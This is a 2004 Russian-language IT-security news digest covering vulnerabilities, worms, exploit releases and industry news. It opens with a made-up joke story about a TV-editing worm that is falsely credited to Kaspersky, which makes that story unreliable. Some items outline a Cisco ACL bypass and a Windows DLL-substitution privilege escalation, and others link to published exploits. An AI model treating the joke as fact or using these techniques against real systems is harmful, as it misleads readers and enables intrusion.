"Наверное многие заметили вчера серьезный всплеск странных писем с приложениями размером 28 Кб. Темы примерно одни и те же - Delivery Error, Status и т.д. Поражает количество писем - даже в разгар известных вирусных эпидемий ничего подобного не происходило…" - пишет один из известных рунетовских обозревателей. Команде UINC удалось выяснить подробности и получить информацию, как говорится, "из первых рук". Речь идет о новом черве, распространяющемся в телеаппаратуре и интеллектуально редактирующем новостные программы. Оказывается, червь работает уже долгое время, но его существование заметили только сейчас - когда он вконец обнаглел и сгенерировал новость об осеннем призыве студентов в ряды вооруженных сил РФ. До этого он гадил по мелочам - снегопады и гололед в Германии, нежелание бывших депутатов съезжать с госквартир и т.п. Особенный всплеск активности этого червя был замечен на старых советских телевизорах одной небезизвестной марки. Множество сообщений с темой типа "Delivery Error" обосновывается просто - червь пытается достать свою обновленную версию из сети, но так, как скорее всего, был сгенерирован в советские времена, имеет устаревшую конфигурацию с неработающими адресами для получения обновлений. На сайте Касперского пока тишина, но нам удалось связаться с одним из сотрудников лаборатории, который подтвердил о обнаружении червя с такими особенностями и сообщил нам, что ведется анализ кода. Новая сигнатура должна вот-вот появиться в базе с меткой "TV-Worm.Rubin.230".
Источник: мы, анфракс, "первые руки", Лаборатория Касперского

31/03/2004 13:09 В Украине будет "правильный" СОРМ.
26 марта в Верховной Раде Украины зарегистрирован законопроект № 4042-1 "О перехвате и мониторинге телекоммуникаций", сообщает bugtraq.ru. В отличие от СОРМа, предполагается технические средства устанавливать не за счет провайдеров, а за счет госбюджета. Но самое главное, что в системе предусматривается три типа терминалов: оперативный (собственно для перехвата), санкционирующий (в суде) и протоколирующий (у уполномоченного по правам человека). Возможность перехвата появится у оперативного терминала только после санкции судебного, при этом все санкции и факты перехвата будут запротоколированы. Идея хорошая, подождем реализаци...
Подробности - http://www.bezpeka.com/news/2004/03/3002.html

31/03/2004 12:33 Уязвимость в mplayer.
Найдена уязвимость в популярном проигрывателе видео файлов mplayer, сообщает linux.org.ru. При проигрывании файлов с удаленного веб-сервера может произойти переполнение кучи (heap) при работе с URL. Злоумышленник может воспользоваться уязвимостью и выполнить произвольный код на машине путём формирования URL специального вида.
Подробнее - http://www.securityfocus.com/archive/1/359025/2004-03-27/2004-04-02/0

31/03/2004 12:10 Монитор безопасности WinBlox.
Известный исследователь компьютерной безопасности, неоднократно упоминавшийся в наших новостях Лю Ди Ю (Liu Die Yu) из Китая анонсировал созданный им монитор безопасности под названием WinBlox, написанный им в результате работы над уязвимостями в IE и в Windows. Этот монитор отслеживает обращения всех приложений, выполняет функции файрволла (или шпиона - в зависимости от конфигурации), обладает гибкой системой настройки конфигурации, большой скоростью работы. Работает в ОС WinNT и более поздних (XP, 2K, 2003). WinBlox является абсолютно бесплатным продуктом. На настоящий момент доступна для скачивания версия 6.0.
Подробности - http://umbrella.name/winblox/

31/03/2004 11:37 Поднятие локальных привилегий в Windows 2000/XP/2003.
Уязвимость обнаружена в ярлыках в Windows 2000/XP/2003. Локальный пользователь может, при некоторых условиях, поднять свои привилегии. Уязвимость обнаружена в приложениях, взаимодействующих с отдельными процессами или библиотеками. При взаимодействии приложения с отдельным приложением, или библиотекой, то можно подменить адрес дочернего процесса, то есть местонахождение приложения или библиотеки. Проблема состоит в том, что часто при написании приложений указывается не полный путь к файлу, если файл находится в директории с вызываемым приложением, а указывается просто имя файла. Если же подменить в свойствах ярлыка путь к рабочей папке программы, то программа будет искать библиотеку не в своей папке, а том месте, которое указано в свойствах ярлыка (свойства ярлыка -> "Рабочая папка"). Тем самым можно подменить библиотеку (приложение, которое вызывается как дочерний процесс), и выполнить произвольный код. Взломщик, имея права с ограниченными привилегиями, и не имеющий права на запись в директории рассматриваемого приложения, может подменить местонахождение библиотеки и позднее, когда пользователь с административными правами запустит уязвимое приложение (при этом выполнится произвольный код), получить привилегии администратора. Практической реализации данной уязвимости не существует в настоящее время.
Более подробно - http://www.securitylab.ru/44202.html

31/03/2004 11:15 Европу соединят с Азией новым кабелем.
Консорциум, состоящий из 16 операторов магистральных сетей Азии и Европы, готовится приступить к прокладке подводного кабеля пропускной способностью 1,28 Тбит/c, конечные точки которого будут находиться в Сингапуре и Франции, а промежуточные узлы - в Италии, Алжире, Тунисе, Египте, Саудовской Аравии, ОАЭ, Пакистане, Индии, Шри-Ланке, Бангладеш, Таиланде и Малайзии. Кабель получит название SEA-ME-WE (Southeast Asia - Middle East - Western Europe) 4. Его протяженность составит 20 тыс. км. Передача данных по кабелю будет осуществляться с использованием оборудования DWDM/SDH производства компании Alcatel. SEA-ME-WE 4 будет действовать параллельно с ныне эксплуатируемым SEA-ME-WE 3, загрузка которого приближается в последнее время к предельно допустимой. По расчетам, прокладка нового кабеля обойдется в 0,5 млрд. долл., втрое дешевле чем SEA-ME-WE 3 благодаря падению цен на телекоммуникационное оборудование.
Источник - http://www.osp.ru

31/03/2004 10:43 Sun предложит простой Java-инструментарий для Web.
В следующем месяце Sun Microsystems начнет широкую программу тестирования ПО Java Studio Creator — инструмента разработки Java, посредством которого компания намерена переманивать программистов у Microsoft. В понедельник Sun объявила, что программа раннего доступа к Java Studio Creator, официально называемая Project Rave, начнется 8 апреля. Бета-версия включает усовершенствования, которые войдут в окончательную версию Creator (Sun планирует выпустить ее этим летом). Java Studio Creator — новый продукт в семействе инструментов Sun Java, предназначенных для создания бизнес-приложений. Creator нацелен на тех разработчиков ПО, которым нужны визуальные инструменты, помогающие быстро конструировать относительно простые веб-приложения. Еще Sun продает Java Studio Enterprise — инструмент программирования, обладающий достаточными возможностями для создания сложных Java-приложений, таких как веб-сайт, рассчитанный на массового пользователя. При помощи Creator Sun надеется привлечь внимание миллионов программистов на Visual Basic, предоставив им Java-альтернативу популярного инструмента Microsoft. К тому же Creator должен стимулировать продажи серверного ПО Java и аппаратуры компании. В последнее обновление инструмента добавлена поддержка JavaServer Faces, Java-стандарта для создания визуальных приложений, подключаемых к базам данных. Кроме того, Sun внесла в Creator некоторые особенности интерфейса версии 3.6 NetBeans. (NetBeans — это ПО с открытым исходным кодом, составляющее основу инструментов разработки Sun Java.)
Подробности - http://zdnet.com.com/2100-1104_2-5181438.html

31/03/2004 10:27 DR DOS ещё жив!
Оказывается, довольно популярная в прежние времена ОС DR DOS ещё по-прежнему жива и поддерживается. На соответствующем сайте описываются возможности версии 8.0. Так, эта ОС работает на процессорах Pentium, 486, 386 и обеспечивает многозадачность и файловую систему FAT32. Подобная ОС является неплохим решением для встроенных ОС, пишут разработчики. Однако, заметим от себя в качестве встроенных ОС бОльшее распространение получили ОС реального времени, среди которых заметно выделяется QNX, являющаяся ОС жёсткого реального времени. Кстати, лицензия на 5 пользователей DR DOS стоит 200 убитых енотов. ;)
Подробности - http://www.drdos.com/products/drdos80.htm

31/03/2004 10:12 Первая волна судебных исков против европейских пользователей Р2Р-сетей.
Международная федерация звукозаписывающей индустрии (IFPI) намерена подать иски против 247 жителей трех европейских стран и Канады, уличенных в незаконном фалообмене. Предполагается, что серия разбирательств будет инициирована сразу в Германии, Италии, Дании и Канаде. По словам главы IFPI Джея Бермана, в прошлом году было разослано около 21 миллиона предупреждений пользователям пиринговых сетей, однако многие любители бесплатной музыки до сих пор уверены, что им ничего не грозит. В связи с этим Международная федерация звукозаписывающей индустрии планирует перейти к более действенным мерам. В частности, повестки в суд уже получили около тридцати граждан Италии, а их компьютеры были конфискованы в качестве вещественных доказательств нарушения авторских прав музыкантов. В Дании 120 человек получили уведомления с требованием немедленно прекратить загрузку пиратских композиций. В Британии пока никаких исков против пользователей пиринговых служб подано не было, передает ВВС.
Источник - http://www.compulenta.ru

31/03/2004 09:59 Для рекламы своих продуктов Microsoft посадит российских пиратов.
Корпорация Microsoft сменила стратегию своего поведения на российском рынке и начала активно бороться с распространителями нелицензионных операционных систем Windows и другого программного обеспечения. Успехи в судебном преследовании пиратов совпали по времени с новой рекламной кампанией продуктов Microsoft. По информации сайта ежедневной газеты "Коммерсант", в понедельник Таганский районный суд Москвы приговорил руководителей "Альфа Компьютерс" по статье 146 УК РФ ("Нарушение авторских прав") к шести месяцам заключения и штрафу в 1 миллион рублей в пользу корпорации Билла Гейтса и 100 тысячам рублей в пользу государства. Вина предпринимателей состояла в том, что они, ремонтируя компьютеры, устанавливали на них пиратское ПО. В настоящее время идет расследование по еще одному делу, инициированному Microsoft, - установку нелицензионных программ на компьютеры, продававшиеся через сеть бытовой электроники "Эльдорадо". Как сообщает агентство "Росбалт", похожая ситуация возникла недавно в подмосковном Жуковском, где был задержан частный предприниматель, торговавший компьютерной техникой с контрафактным ПО Microsoft. Ущерб, причиненный корпорации его действиями оценивается в 246 тысяч рублей. Аналитики полагают, что добиться таких же результатов на поприще борьбы с пиратами Microsoft мог и пять лет назад. Но тогда подобный маркетинговый ход не был бы так целесообразен. Напротив, именно пираты подготовили российский рынок и добились того, что почти на каждом компьютере в стране установлены программы от Гейтса.
Подробности - http://www.lenta.ru/internet/2004/03/30/microsoft/

30/03/2004 12:51 Египетские исламисты пожаловались на израильских хакеров.
Администраторы одного из самых популярных исламских сайтов Islamonline.net обвинили израильских хакеров в нападении на свой ресурс, сообщает агентство Europa Press. По словам представителей редакции сайта, атака произошла спустя некоторое время после появления на его страницах специального заявления, связанного с убийством духовного лидера палестинской террористической организации ХАМАС шейха Ахмеда Ясина. Как отметил главный редактор Islamonline.net Абдель Хади Абу Талеб, в результате нападения сайт был недоступен для посетителей в течение трех с лишним часов. Еще один сотрудник редакции рассказал, что в адрес сотрудников и прежде приходило огромное количество писем-угроз от израильтян. Редакция сайт Islamonline.net с 1999 года работает в Каире и размещает на страницах своего ресурса информацию на арабском и английском языках. Помимо сугубо информационных материалов, сайт периодически публикует фетвы (заключения мусульманских богословов).
Источник - http://www.viruslist.ru

30/03/2004 12:06 Fedora Core 2 Test 2 доступна для скачивания.
Red Hat объявила о доступности для скачивания второй тестовой версии своего нового дострибутива Fedora Core. Второй тест-релих вышел в свете грядущей в апреле второй версии Fedora Core 2, которую обещают построить на базе ядра 2.6. Фактически эта версия является багофиксом предыдущей test 1. Представлены - ядро 2.6, gnome-2.5 и kde-3.2.
Подробности - http://www.redhat.com/archives/fedora-announce-list/2004-March/msg00022.html

30/03/2004 11:52 Эксплоит уязвимостей в продуктах CISCO.
Опубликован код, эксплуатирующий девять уязвимостей в маршрутизаторах CISCO (Cisco 677/678 Telnet Buffer Overflow Vulnerability, Cisco IOS Router Denial of Service Vulnerability, Cisco IOS HTTP Auth Vulnerability, Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability, Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability, Cisco 675 Web Administration Denial of Service Vulnerability, Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability, Cisco IOS Software HTTP Request Denial of Service Vulnerability , Cisco 514 UDP Flood Denial of Service Vulnerability). Атака направлена, естественно, на выпускаемую ОС IOS. Написан на Perl.
Эксплоит - http://www.securitylab.ru/_Exploits/2004/03/cisco.pl.txt

30/03/2004 11:38 Privacy на АТВ или кто залез в мой компьютер?
В прошлую пятницу состоялась очередная онлайновая передача в рамках АТВшного проекта Полит X, посвященная на этот раз теме безопасности личной информации, сообщает dl на своём сайте www.bugtraq.ru. Принимали участие: Илья Гофман, Дмитрий Леонов, Максим Мошков, Дмитрий Скляров. Видеозапись доступна в онлайне, стенограмма в процессе подготовки. Желающие могут ознакомиться.
Подробности - http://www.politx.ru/xarchive/16/

30/03/2004 11:26 Спам ищет новые выходы.
По прогнозу фирмы Radicati Group, в нынешнем году количество непрошеных сообщений в IM-сетях увеличится с прошлогодних 400 млн. до 1,2 млрд. Как считают аналитики, основным катализатором роста объемов IM-спама будет расширение применения на предприятиях систем мгновенного обмена сообщениями и, соответственно, участившиеся публикации в открытых источниках персональных IM-идентификаторов. По данным компании Ferris Research, в прошлом году по сравнению с позапрошлым рынок корпоративных систем мгновенного обмена сообщениями вырос на 130%, а в нынешнем, как предсказывают аналитики, увеличится еще на 85%. К 2007 году численность пользователей корпоративных систем мгновенного обмена сообщениями достигнет 182 млн., а средний ежегодный прирост данного показателя будет составлять 79%. Как отмечают в Ferris Research, особенности технологии мгновенного обмена сообщениями таковы, что рассылаемая с ее помощью реклама может быть более эффективной по сравнению с почтовым спамом. Согласно прогнозу Radicati, объем спама, доставляемого по электронной почте, в нынешнем году по сравнению с 2003-м вырастет в два с лишним раза, за год будет отправлено около 35 млрд. непрошеных сообщений.
Источник - http://ww.osp.ru

30/03/2004 10:38 Флэш-логин для Windows XP.
Хотите, чтобы ваш логин-экран при входе в Windows XP выглядел красиво и стильно? В принципе, программ, реализующих подобную функцию довольно много. Однако господа из FrontMotion пошли по довольно необычному пути и сделали одноимённый Login, написанный на флэше, что, как пишут авторы, придаёт ему динамику, интерактивность и функциональность. Для установки не требуется ни хака системных DLL, ни удаления системных файлов. Тем не менее, хотелось бы обратить внимание, что пока это только версия бета (со всеми вытекающими последствиями) - 1.0.157.37 Beta.
Сайт проекта - http://www.frontmotion.com/

30/03/2004 10:22 Вирмейкер и Закон.
Под таким заголовком опубликована статья Игоря Дикшева, написаннная специально для сайта ZDNET.RU. Как пишет сам автор, статья представляет собой критический взгляд на формулировку статьи 273 УК РФ: «Создание, использование и распространение вредоносных программ для ЭВМ». Согласно автору, нестыковок в трактовании этой статьи довольно много, некоторые довольно странные. Статья рекомендуется к прочтению адвокатам, ибо на её основании можно с изумительной лёгкостью отмазать даже самогО небезызвестного Морриса. ;)
Статья - http://zdnet.ru/?ID=445289

30/03/2004 10:08 Эмулятор ZX Spectrum для смартфонов.
Небольшая британская компания White Cloud Software, специализирующаяся на разработке программного обеспечения для сотовых телефонов и смартфонов, выпустила эмулятор компьютера ZX Spectrum, предназначенный для устройств на базе ОС Symbian. Эмулятор, получивший название Spectrian, рассчитан на следующие модели смартфонов: Nokia 3650, 7650, 6600, N-Gage, Siemens SX1, Samsung SGH-D700 и Sendo X. Из основных функций эмулятора можно упомянуть следующие: поддержка исполняемых файлов в форматах Z80, SNA и TAP, полноценная поддержка звука, возможность ввода текста, что позволяет играть в текстовые квесты, возможность задавать горячие клавиши для приложений и игр, эмуляция курсора, управляющих клавиш, джойстика и многое другое. По отзывам некоторых пользователей, уже опробовавших Spectrian, он работает намного быстрее и стабильнее эмулятора ZX Spectrum для Palm-совместимых устройств. С сайта разработчика можно скачать демонстрационную версию программы, единственное ограничение которой заключается в том, что она не позволяет осуществлять в играх сохранение. Стоимость же полной версии составляет 15 евро.
Источник - http://www.compulenta.ru

30/03/2004 09:26 Выход x25zine-4.
Как сообщил нам посетитель нашего сайта вышел 4-й номер популярного в сетевом сообществе электронного журнала x25zine. Cкачать новый номер можно на сайте, специально созданном для этого. К сожалению на момент опубликования новости достучаться до сайта не удалось, поэтому состав статей журнала мы привести не можем. Возможно, вам повезёт больше.
Сайт проекта - http://www.x25zine.org

29/03/2004 16:42 Уязвимость в FreeBSD.
Команда разработчиков ОС FreeBSD выпустила бюллетень по безопасности FreeBSD-SA-04:06.ipv6, в котором описывается уязвимость в реализации протокола IPv6 в ядре системы. Уязвимость присутствует в функции setsockopt(2), задающей параметры сокета протокола IPv6. Из-за некорректной реализации разбора некоторых опций этой функции позволяет получить доступ к критичным областям памяти, не обладая для этого соответствующими полномочиями. Так как в FreeBSD реализована т.н. реализация проекта KAME, уязвимость в других ОС отсутствует (скорее всего). Наличие уязвимости позволяет локальному пользователю либо получить доступ к критичным областям памяти, либо вызвать панику ядра. Выпущено обновление. Как вариант предлагается ввести ограничение в параметры ядра: sysctl security.jail.socket_unixiproute_only=1. Уязвимость обнаружена в FreeBSD 5.2-RELEASE.
Подробности - ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-04%3A06.ipv6.asc

29/03/2004 16:24 Эксплоит уязвимости iss_pam1.dll.
Некий господин Sam Chen из Китая опубликовал эксплоит уязвимости библиотеки iss_pam1.dll в продуктах ISS BlackIce и RealSecure. Напомним, что ранее эту уязвимость использовал червь witty, да и сам автор не скрывает, что при написании эксплоита он использовал технологию этого червя.
Эксплоит - http://www.securityfocus.com/archive/attachment/358857/2/

29/03/2004 15:14 RTFM: Как избавиться от автозапуска левых сайтов в IE.
На сайте sysadmins.ru опубликован документ в разделе RTFM, посвящённый описанию довольно распространённой среди определнной (и довольно многочисленной, надо признать) группы пользователей Интернет, заключающейся в загрузке определённой (в большинстве случаев - неприличной) страницы при запуске IE. Эта проблема в последнее время стала настолько распространена, что заслуживает отдельного рассмотрения. Если вам не повезло, то сносить под корень операционную систему не спешите - автором (Tapis) написана инструкция по решению этой проблемы.
Статья - http://portal.sysadmins.ru/board/viewtopic.php?t=38918

29/03/2004 14:15 Microsoft представит Windows CE 5.0 в 3 квартале.
Microsoft выпустит новую версию ОС для встраиваемых устройств Windows CE в начале 3 квартале этого года, в то время как предварительная версия будет выпущена уже на этой неделе. 1 апреля компания представит техническое превью Windows CE 5.0 (версия, ранее известная как Macallan), которое можно будет скачать из Сети, заявил сайт vnunet.com. По словам представителей Microsoft, в новой ОС будет реализована возможность переключения между IDE и прямым доступом к программам из командной строки. Помимо этого, будут включено около 50 драйверов для увеличения производительности разнообразных устройств типа аудио, PCMCIA и LAN-адаптеров. Новые функции также будут поддерживать мультимедийные мобильные устройства - FastStart обеспечит быстрое воспроизведение мобильного контента. В Platform Builder включены инструменты создания отчетов, а также набор новых программ для автоматического тестирования. Производство ОС Windows CE 5.0 будет начато в начале июля, а полках магазинов система окажется в августе-сентябре.
Источник - http://www.cnews.ru

29/03/2004 13:32 Wi-Fi распространится на зону покрытия сотовых сетей.
Совместными усилиями американских компаний Lucent Technologies, In Motion Technology и китайской Top Global разрабатывается решение Wi-Fi on The Move, которое позволит осуществлять высокоскоростной доступ к Internet в поездах, автобусах и автомобилях через беспроводные локальные сети. Решение позволит реализовать поддержку Wi-Fi в сетях мобильной связи третьего поколения, выполненных по технологии EV-DO разработки Lucent (скорость передачи данных - от 300 до 500 Кбайт/с). По словам представителя Lucent, компания как раз недавно получила полмиллиарда долларов от Verizon Wireless на развертывание сетей EV-DO в ряде крупных городов США. Так что теоретически везде, где мобильный телефон будет "видеть" сеть, вскоре можно будет рассчитывать и на доступ к Wi-Fi. Вот только о безопасности подобных соединений почему-то ни слова не сказано...
Источник - http://www.osp.ru

29/03/2004 13:09 В США ждут уникального суда над кибершпионом.
Бывший менеджер одной из американских страховых компаний, 46-летний Ларри Ли Ропп (Larry Lee Ropp), стал первым обвиняемым в совершении преступления с помощью программы для фиксирования комбинаций на клавиатуре компьютера (keylogger, короче). Прежде подобных прецедентов в судебной практике США не встречалось, уточняет Reuters. По данным американских прокуроров, житель штата Калифорния установил шпионскую программу на одном из компьютеров страховой компании Bristol West Insurance Group и с ее помощью получал информацию о всех нажатиях клавиш на устройстве ввода интересующей его машины. Обвинители признаются, что не знают, какого рода информацию Ропп надеялся получить, контролируя компьютер секретаря его бывших руководителей. Однако согласно тексту письменных показаний, включенных в дело кибершпиона, речь, возможно, идет о сборе компромата. О преступной деятельности бывшего страхового агента следствию стало известно после его увольнения. Покинув ряды сотрудников Bristol West Insurance Group, Ропп обратился к коллеге с просьбой удалить шпионскую программу с компьютера секретаря.
Подробности - http://news.zdnet.co.uk/internet/security/0,39020375,39149886,00.htm

29/03/2004 12:45 Выпущен дистрибутив ALT Linux 2.3 Compact.
Российский Linux-разработчик, компания ALT Linux объявила о выходе нового однодискового дистрибутива ALT Linux 2.3 Compact. По словам генерального директора компании Алексея Смирнова, этот дистрибутив представляет собой совершенно новое Linux-решение, предназначенное, в первую очередь, для OEM-производителей, хотя и в розничную продажу дистрибутив также поступит. Главное отличие новинки от предшествующего релиза ALT Linux 2.2 Junior состоит в том, что в ней отсутствует большое количество программ одного назначения (браузеры, почтовые клиенты и т.п.). Отсутствует даже оконный менеджер Gnome. Тем не менее, все необходимое для работы обычного пользователя имеется. Основные компоненты дистрибутива ALT Linux 2.3 Compact: ядро Linux версии 2.4 (ядро 2.6 не используется, так как, по словам Алексея Смирнова, оно еще недостаточно доработано), графическая система XFree86 версии 4.3, графическая пользовательская среда KDE, офисный пакет OpenOffice.org 1.1 с поддержкой русского языка, веб-браузер и почтовый клиент Mozilla 1.6, графический редактор Gimp 1.25. Полный список пакетов можно найти здесь.
Пресс-релиз - http://www.altlinux.ru/?module=compact23

29/03/2004 11:48 Появление новых модификаций червей Bagle и Netsky.
Как сообщает "Лаборатория Касперского", появились очередные модификации червей Bagle и Netsky - t и r (соответственно). I-Worm.Bagle.t практически полностью идентичен ранее обнаруженной версии Bagle.s. Обе версии распространяются в электронных письмах без темы и какого-либо текста с вложением размером 8208 байт. Но, в отличие от Bagle.s, название файла вложения в зараженное Bagle.t письмо постоянно - «game.exe». Особенности I-Worm.Netsky.r на данный момент анализируются.
Источник - http://www.kaspersky.ru

29/03/2004 11:07 В Китае введены новые ограничения на деятельность интернет-кафе.
Главы органов местной власти Китая запретили работу интернет-кафе в жилых районах и в местах, расположенных ближее 200 метров от школ с целью заботы о "психическом здоровье" детей, сообщает агентство France Presse. Решение о введении ограничений на работу интернет-кафе было принято главным управлением промышленности и торговли, в введении которого находится контроль за деятельностью этих заведений. По словам представителей управления, в настоящее время в Китае существует огромное количество интернет-кафе, в том числе нелицензированных, которые способствуют рапространению неблагоприятной информации для школьников. "Интернет-кафе нанесли существенный вред психическому здоровью подростков и процессу их обучения", - говорится в заключении чиновников. Правозащитные организации уже оценили новое решение властей как попыту ввести контроль за Интернетом. Сейчас в Китае насчитывается около 70 миллионов интернет-пользователей. Это второй показатель в мире после США.
Подробнее - http://www.dailytimes.com.pk/default.asp?page=story_29-3-2004_pg6_5

28/03/2004 20:36 Обзор Windows Longhorn 4051.
На сайте, посвящённому непосредственно обзорам грядущей версии M$ Windows под названием Longhorn опубликован обзор билда 4051. 26 октября 2003 года этот билд, названный pre-beta 1 был представлен корпорацией Microsoft на конференции разработчиков. Этот билд является следующим после 4029, но в нем есть разительные отличия, что дает повод поговорить о некоей тендеции развития этой ОС. Система до сих пор не снабжена рабочей версией WinFS, скорее всего на начальном этапе разработчикам было дано распоряжение разработать интерфейс в первую очередь, чтобы представить его на вышеупомянутой конференции. Что они сделали очень неплохо, их усилия можно видеть на многочисленных скриншотах у нас в обзоре. Самый объемный раздел посвящен всему тому, что касается этого билда - от процесса установки, многочисленных скриншотов до характеристик работы отдельных фрагментов. Все это аккуратно разложено по разделам, в общей сложности Вас ждут 13 страниц, полных информацией, и 65 скриншотов. Желающие могут ознакомиться.
Обзор - http://longhorn.winall.ru/4051/

28/03/2004 15:27 Торгово-промышленная палата рассылает спам.
Во всем мире региональные Торгово-промышленные палаты являются объединением наиболее респектабельных коммерческих компаний. Быть членом ТПП престижно, а членство накладывает на компанию повышенные требования к соблюдению профессиональной этики и принятых обычаев делового оборота. Однако в России традиции деловой этики, судя по всему, еще не сформировались. Сегодня зарегистрирован случай рассылки спама от имени компании «Столичный стиль», которая учреждена Московской ТПП. Это беспрецедентный случай, который порочит репутацию не только названной фирмы, но и всего российского делового сообщества. О появлении спама от «Столичного стиля» сообщил Евгений Альтовский, координатор Рабочей группы Проекта «АнтиСпам». Он получил письмо с рекламой консультационного семинара. Кстати, возможно завтра мы опубликуем собственный комплейн о работе одного московского провайдера по предотвращению рассылки спама от имени одного из клиентов. В данный момент ожидается ответ на уже второе письмо с просьбой оградить нас от спама.
Подробнее - http://www.webplanet.ru/news/internet/2004/3/26/ttp_spam.html

28/03/2004 13:09 Обход блокировок на CISCO роутере при сканировании сети.
Проблема жила достаточно долго, но только сейчас удалось найти причину, по которой пакеты от запрещенных адресов проникали в локальную сеть. Итак, есть роутер фирмы CISCO с "биосом" IOS (tm) 2500 Software (C2500-F2IN-L), Version 11.2(11), RELEASE SOFTWARE (fc1). Есть правила на роутере, которые запрещают извне приватные сети. "Нормальные" пакеты с этих сетей блокируются, но если послать пакет с флагами RST ASK, то такой пакет будет пропущен. Система автоматического обнаружения атак RealSecure такие пакеты идентифицирует как TCP_Probe_протокол. CheckPoint Firewall ругается "First packet isn't SYN tcp_flags: RST-ACK". Возможно, обновление IOS решит проблему, но новый IOS просто не влезет в устаревший роутер, а большинство компаний не согласится тратить деньги на замену железа. Следовательно, проблема защиты от сканирования сети у многих останется открытой.
Источник - http://www.bugtraq.ru

28/03/2004 12:56 Израильские хакеры атаковали исламский портал.
дминистрация популярного исламского Интернет-портала в пятницу выступила с обвинительными заявлениями в адрес израильских хакеров. Якобы, последние атаковали сайт www.islamonline.net после того, как на нем вывесили материал, посвященный убитому главарю ХАМАСа шейху Ясину. Проблема, по словам Абделя Хади Абу Талеба, состояла в том, что материал о шейхе был недоступен в четверг в течение трех часов. Другой представитель редакции сайта Хуссамеддин Сайед сообщил в интервью агентству 'Франс-Пресс', что ранее от израильтян приходили сообщения угрожающего характера. Однако никаких конкретных подтверждений обвинительных заявлений редакция www.islamonline.net не предоставила. Означенный исламский портал был создан в 1999 году и базируется в Каире. Он предлагает информацию на арабском и английском языках, а также тексты фатв (религиозных предписаний), в том числе исходящие от популярного в мусульманском мире катарского клерика Юсефа аль-Карадави. Посещаемость сайта после ликвидации Ясина, как сообщается, резко возросла в несколько раз.
Источник - http://www.crime-research.ru

28/03/2004 12:31 Российский 500 МГц процессор МЦСТ R500.
Выпущен новый отечественный микропроцессор МЦСТ R500, к производству которого приступило ЗАО "Эльбрус МЦСТ" (Elbrus MCST — Moscow Center of Sparc Technology, московский центр Sparc-технологий) под руководством Б.А.Бабаяна. На сайте iXBT представлены первые эксклюзивные фотографии этих процессоров, производство которых уже налажено в серийных масштабах. Речь идет о представителях семейства SPARC-совместимых процессоров серии "МЦСТ-R". Универсальные процессоры МЦСТ R-500 работают на тактовой частоте 450 МГц — 500 МГц, обладают энергопотреблением менее 2 Вт, состоят из 4,2 млн. транзисторов, изготавливаются с применением норм 0,13 мкм техпроцесса с 8 слоями металлизации. Площадь кристалла чипа составляет 20 мм², напряжение питания ядра — 1,2/3,3 В, заявленная производительность – порядка 400 MIPS, 170 MFLOPS. Процессоры выпускаются в 420-контактных корпусах BGA. Новые процессоры МЦСТ R-500 уже проверены в составе вычислительного комплекса "Эльбрус 90-микро" под управлением операционных систем Solaris, Linux и на большом комплексе прикладных задач.
Подробнее - http://ixbt.com/news/hard/index.shtml?hard103159id

28/03/2004 12:17 ISS выпустила новое ПО для Linux.
Internet Security Systems объявила о выходе версии системы обнаружения атак RealSecure Server для операционных систем Linux RedHat Professional 8 и 9 и Linux RedHat Enterprise 2.1 и 3.0. К ключевым особенностям новой версии относится независимость от ядра ОС, которая позволяет не переустанавливать сенсор в случае обновления ядра операционной системы Linux, которое меняется очень часто. Вторым отличием новой версии является возможность обнаружения атак в зашифрованном SSL-трафике для Apache 1.3.x и 2.x.
Источник - http://www.nixp.ru

28/03/2004 11:51 Опасность заражения червем Netsky продолжает возрастать.
Все свидетельствует о том, что создатели данного червя передали его код группе хакеров, что может привести к возникновению новой волны червей. Червь Netsky, наряду с Mydoom и Bagle, является одним из ведущих игроков кибер войны, которая стала причиной появления ряда вирусов и их версий, заполонивших Интернет более месяца тому назад. Оружием в этой битве являются вредоносные программы и их версии, наделенные своими создателями оскорбительными выражениями против друг друга. Однако, как только конфликт начал стихать, новое сообщение раскрыло намерения Netsky, как минимум, продолжать заражать компьютеры. Ниже приведен текст, скрытый в коде N версии Netsky:
<*>NetDy: Thanks to the S*k*y*N*e*t alias *N*e*t*S*k*y* crew for the sourcecode.
<*>NetDy: We have rewritten *N*e*t*S*k*y.
<*>NetDy: Thats a good tactic to detroy the bagle and mydoom worms.
<*>NetDy: Our group will continue the war.
<*>NetDy: Malware writers'End'comes true.
<*>NetDy: Our Social Engineering is the best *lol* (You have no virus symantec says!).
Поэтому, несмотря на то, что уже существует 16 различных версий Netsky, можно ожидать появления новых и более опасных последователей. По мнению Луиса Корронса (Luis Corrons), возглавляющего лабораторию PandaLabs, “Не стоит терять бдительность, новые версии могут появиться в любой момент. Тот факт, что это именно версии, усложняет ситуацию, поскольку обычно каждый червь является усовершенствованной моделью своего предшественника и способен нанести еще больший вред”.
Источник - http://www.viruslab.ru

27/03/2004 20:42 Безопасные сетевые устройства Symantec.
Компания Symantec представила новую серию сетевых шлюзов, которые, как она надеется, помогут ей привлечь больше клиентов из сферы малого бизнеса. «Мы предлагаем устройства обеспечения безопасности уже много лет, и нам удалось достичь некоторого прогресса, -- заявил Джордж Слаз, менеджер по продукции Symantec из Калифорнии. – У нас есть ряд предложений для крупных предприятий, однако, мы хотим работать и с малыми компаниями». Каждый из продуктов новой серии Gateway Security 300 будет поставляться с шестью интегрированными функций безопасности. Кроме того, линейка Gateway Security 300 дает пользователям возможность эксплуатировать безопасные точки беспроводного доступа в локальных сетях. В устройствах Symantec объединены firewall-защита, системы мониторинга и предотвращения вторжений, реализации корпоративных политик безопасности, антивирусной защиты, фильтрации контента, а также VPN-функции. Серия Gateway Security 300 включает в себя три модели: 320, 360 и 360R. Они призваны анализировать IP-пакеты и пункты их назначения в целях блокировки вредоносных данных, удаленной проверки компьютеров на наличие вирусов, а также автоматического обновления антивирусных программ Symantec. Каждое устройство имеет резервную функцию кабельного подключения к интернету в случае проблем с основным каналом широкополосного соединения. По словам Стива Ханта, аналитика фирмы Forrester Research, это оборудование хорошо тем, что «его достаточно просто подключить, и оно уже работает. Таким образом, теоретически, малое предприятие может купить это устройство и установить его, не прибегая для его установки к услугам системных интеграторов и не привлекая специалистов извне».
Источник - http://www.setevoi.ru/

27/03/2004 20:16 ICQ-спам: стоит ли овчинка выделки?
